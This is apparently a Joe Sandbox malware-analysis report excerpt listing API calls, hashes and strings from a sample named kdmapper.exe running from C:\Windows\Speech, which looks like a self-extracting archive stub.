                                                                                                                                                                          • Opcode ID: e21fcfceb15a528f540ab104b92e8c7e38e3a443d69f9e42ea3b2a84c455a8af
                                                                                                                                                                          • Instruction ID: ba38bb50922e906a233f8ddca91e8e72b5d1aa97119f5244bcc56d97ccc75878
                                                                                                                                                                          • Opcode Fuzzy Hash: e21fcfceb15a528f540ab104b92e8c7e38e3a443d69f9e42ea3b2a84c455a8af
                                                                                                                                                                          • Instruction Fuzzy Hash: E151E935288300F6E7211AE48D47F757677AB07B04F28851BF3966C4E1C9B3A4626BDE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Speech\kdmapper.exe,00000104), ref: 00647FAE
                                                                                                                                                                          • _free.LIBCMT ref: 00648079
                                                                                                                                                                          • _free.LIBCMT ref: 00648083
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                          • API String ID: 2506810119-2414484506
                                                                                                                                                                          • Opcode ID: 8709c1a257bd250d8bacce9e7a41600c73f5e8a56981dda8cf0246ecc5ee3746
                                                                                                                                                                          • Instruction ID: 1fbdba3bdc9ec291859b83693e770ae35f899a4824ed79869abed3ade00ebc65
                                                                                                                                                                          • Opcode Fuzzy Hash: 8709c1a257bd250d8bacce9e7a41600c73f5e8a56981dda8cf0246ecc5ee3746
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F319FB1A00219AFDB21DF99D880D9EBBFEEF95710F10416AF90497211DB718E85CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 006431FB
                                                                                                                                                                          • _abort.LIBCMT ref: 00643306
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EncodePointer_abort
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 948111806-2084237596
                                                                                                                                                                          • Opcode ID: da4c849f5b6e1b816ac37d9fb8892e6304db530ebc579b1b0d6c097a4f8a809c
                                                                                                                                                                          • Instruction ID: 3042e0e3e3d8f8696826629a63a082d6c5a409ad05472bd4277bade29eff033d
                                                                                                                                                                          • Opcode Fuzzy Hash: da4c849f5b6e1b816ac37d9fb8892e6304db530ebc579b1b0d6c097a4f8a809c
                                                                                                                                                                          • Instruction Fuzzy Hash: D9416A71900219AFCF16DFA4CD82AEEBBB6BF48304F148059F90467312D375AA50DB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00627406
                                                                                                                                                                            • Part of subcall function 00623BBA: __EH_prolog.LIBCMT ref: 00623BBF
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 006274CD
                                                                                                                                                                            • Part of subcall function 00627A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00627AAB
                                                                                                                                                                            • Part of subcall function 00627A9C: GetLastError.KERNEL32 ref: 00627AF1
                                                                                                                                                                            • Part of subcall function 00627A9C: CloseHandle.KERNEL32(?), ref: 00627B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                          • API String ID: 3813983858-639343689
                                                                                                                                                                          • Opcode ID: ec1171b78b248b97bbf9d6d49bcf8c7b00366be5c793d2e6cd0bbe0d04c17fe6
                                                                                                                                                                          • Instruction ID: 631cd627789fa7934af3ff4bc0f3e41f95da6eae54f5d0f33bb67a4b4768a462
                                                                                                                                                                          • Opcode Fuzzy Hash: ec1171b78b248b97bbf9d6d49bcf8c7b00366be5c793d2e6cd0bbe0d04c17fe6
                                                                                                                                                                          • Instruction Fuzzy Hash: B131B371D04668AADF51EFA4EC45FEEBBBBAF09304F044019F405B7281CB748A448F64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                            • Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0063AD98
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0063ADAD
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0063ADC2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: ASKNEXTVOL
                                                                                                                                                                          • API String ID: 445417207-3402441367
                                                                                                                                                                          • Opcode ID: 171f312f5895dd561685eda9224176aeb6aeec2876e611c5e9e51b7d7046e0e2
                                                                                                                                                                          • Instruction ID: 816a507842e08c41166b409bda788dd1f280cbfb3265ae19edc76e1ee34deeb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 171f312f5895dd561685eda9224176aeb6aeec2876e611c5e9e51b7d7046e0e2
                                                                                                                                                                          • Instruction Fuzzy Hash: C611CB32640210BFD7519FE8ED45FAA776FEF4B742F000214F281DF6A0C7619906ABA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • DialogBoxParamW.USER32(GETPASSWORD1,000303EC,0063B270,?,?), ref: 0063DE18
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DialogParam
                                                                                                                                                                          • String ID: GETPASSWORD1$rc$xzg
                                                                                                                                                                          • API String ID: 665744214-3096991722
                                                                                                                                                                          • Opcode ID: 7dd2862ec6f1325e87a3c22cb564263a580648a691e7ebd55421773df1577d00
                                                                                                                                                                          • Instruction ID: 79a3a79ca48b7d8adad787cd971a34b18da9538d3c17288e43ca3d9cd631ea90
                                                                                                                                                                          • Opcode Fuzzy Hash: 7dd2862ec6f1325e87a3c22cb564263a580648a691e7ebd55421773df1577d00
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E110832600254AADB11DE34BC05BEF3B9BAB05751F144024FE49AB191CAB4AD44D7A4
                                                                                                                                                                          APIs
                                                                                                                                                                          • __fprintf_l.LIBCMT ref: 0062D954
                                                                                                                                                                          • _strncpy.LIBCMT ref: 0062D99A
                                                                                                                                                                            • Part of subcall function 00631DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00661030,00000200,0062D928,00000000,?,00000050,00661030), ref: 00631DC4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                          • String ID: $%s$@%s
                                                                                                                                                                          • API String ID: 562999700-834177443
                                                                                                                                                                          • Opcode ID: 521bd3a98a642cf896befadb96cc12dfb8c9e309173519af1fae108299d87302
                                                                                                                                                                          • Instruction ID: 683fa640d823f0c73b6497c6eaf6d137addda1a9ace11349f7c4528a05566cfc
                                                                                                                                                                          • Opcode Fuzzy Hash: 521bd3a98a642cf896befadb96cc12dfb8c9e309173519af1fae108299d87302
                                                                                                                                                                          • Instruction Fuzzy Hash: 0521A532C40658AEDF21DFA4DC05FDE7BAEAF05704F140015F91096292E272D689CF91
                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0062AC5A,00000008,?,00000000,?,0062D22D,?,00000000), ref: 00630E85
                                                                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0062AC5A,00000008,?,00000000,?,0062D22D,?,00000000), ref: 00630E8F
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0062AC5A,00000008,?,00000000,?,0062D22D,?,00000000), ref: 00630E9F
                                                                                                                                                                          Strings
                                                                                                                                                                          • Thread pool initialization failed., xrefs: 00630EB7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                          • String ID: Thread pool initialization failed.
                                                                                                                                                                          • API String ID: 3340455307-2182114853
                                                                                                                                                                          • Opcode ID: a3db70a9a640379404f41258a29f77550b56f45852cfc7c99624e22e6f631ecc
                                                                                                                                                                          • Instruction ID: f570e32b0e296b9f71793dc1bd1e4330e19dcfe965c2b0411ab1b1406d11fd50
                                                                                                                                                                          • Opcode Fuzzy Hash: a3db70a9a640379404f41258a29f77550b56f45852cfc7c99624e22e6f631ecc
                                                                                                                                                                          • Instruction Fuzzy Hash: AD1191B17007089FD3219F66DC949A7FBEEEB55754F104C2EF1DAC2300DA7159448BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Malloc
                                                                                                                                                                          • String ID: (c$2c$A
                                                                                                                                                                          • API String ID: 2696272793-1818421493
                                                                                                                                                                          • Opcode ID: d40d1b4891bc3d840ce90592474ab05e408ad874fddc7dd53b6d199a7ace6bdb
                                                                                                                                                                          • Instruction ID: 5abb3546f0371d431ea251a4942e929705ca1f96846d04b0565cc788640c9dfe
                                                                                                                                                                          • Opcode Fuzzy Hash: d40d1b4891bc3d840ce90592474ab05e408ad874fddc7dd53b6d199a7ace6bdb
                                                                                                                                                                          • Instruction Fuzzy Hash: 50011771901229ABCB14CFA4E848AEEBBF9EF09700F10416AE906E7340D734DB40CFA4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 0-56093855
                                                                                                                                                                          • Opcode ID: 5c098a37b346f776148bad61baedd9c47599d4a9076189ca29dccb67120a8ccc
                                                                                                                                                                          • Instruction ID: 4b2d1eecca65e8fc1f0b401657336a8f78a061118e7ed55dd0fd201d4d516a64
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c098a37b346f776148bad61baedd9c47599d4a9076189ca29dccb67120a8ccc
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B018F76A04245AFDB118F69FC44A9A7FEBFB49398F041525F806D3330CA719890EBE1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0062E2E8: _swprintf.LIBCMT ref: 0062E30E
                                                                                                                                                                            • Part of subcall function 0062E2E8: _strlen.LIBCMT ref: 0062E32F
                                                                                                                                                                            • Part of subcall function 0062E2E8: SetDlgItemTextW.USER32(?,0065E274,?), ref: 0062E38F
                                                                                                                                                                            • Part of subcall function 0062E2E8: GetWindowRect.USER32(?,?), ref: 0062E3C9
                                                                                                                                                                            • Part of subcall function 0062E2E8: GetClientRect.USER32(?,?), ref: 0062E3D5
                                                                                                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                          • String ID: c$0
                                                                                                                                                                          • API String ID: 2622349952-1042384022
                                                                                                                                                                          • Opcode ID: 7029ef9f3af264ec66f6a8894f01e8c3ab04f193d1cb41f2c6b7ac3a36c483e1
                                                                                                                                                                          • Instruction ID: 6fcc6f44aab4ae7c5f942fa096a215fc44e04698727e50933e31a58865a79207
                                                                                                                                                                          • Opcode Fuzzy Hash: 7029ef9f3af264ec66f6a8894f01e8c3ab04f193d1cb41f2c6b7ac3a36c483e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 76F0A4311086A8B7DF154F60EC0DBE93F5BAF22784F094214FC8598691DB75CA91DF10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                                                                          • Instruction ID: 5b10132e5105f8c908879993669d37d8a5e67c4a004c36bb1e22f4e5397deef1
                                                                                                                                                                          • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                                                                                                          • Instruction Fuzzy Hash: D9A14572A807869FEB21CF28C8917EFBBE6EF52310F1841ADE4859B381C2348941C764
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00627F69,?,?,?), ref: 0062A3FA
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00627F69,?), ref: 0062A43E
                                                                                                                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00627F69,?,?,?,?,?,?,?), ref: 0062A4BF
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00627F69,?,?,?,?,?,?,?,?,?,?), ref: 0062A4C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2287278272-0
                                                                                                                                                                          • Opcode ID: 39c69367eafa6693849dc6a3973acbe681460cb48f2f05a807a5c662e21f9ff0
                                                                                                                                                                          • Instruction ID: f05253a0c9edb1f415490c76139002699a0c76d779e09325c3eb4a77accb4f4c
                                                                                                                                                                          • Opcode Fuzzy Hash: 39c69367eafa6693849dc6a3973acbe681460cb48f2f05a807a5c662e21f9ff0
                                                                                                                                                                          • Instruction Fuzzy Hash: E941CD302487A19BE721EEA4ED45BEEBBE6AB81700F04091DB5D0D72C0D6A4DA48DB53
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,006491E0,?,00000000,?,00000001,?,?,00000001,006491E0,?), ref: 0064C9D5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0064CA5E
                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00646CBE,?), ref: 0064CA70
                                                                                                                                                                          • __freea.LIBCMT ref: 0064CA79
                                                                                                                                                                            • Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                          • Opcode ID: 8618d9e8ab3105a928b23f1bd634dae2541384d718122798fc98f5e36d015e07
                                                                                                                                                                          • Instruction ID: dda195487ef5ff79bacab8de5196159211cfee12454ac149e5e7040bd75e18b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 8618d9e8ab3105a928b23f1bd634dae2541384d718122798fc98f5e36d015e07
                                                                                                                                                                          • Instruction Fuzzy Hash: 0031AE72A0121AABDF25DF64CC51DEE7BA6EB01720F044128FC04E6350EB35CD90DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0063A666
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0063A675
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0063A683
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0063A691
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
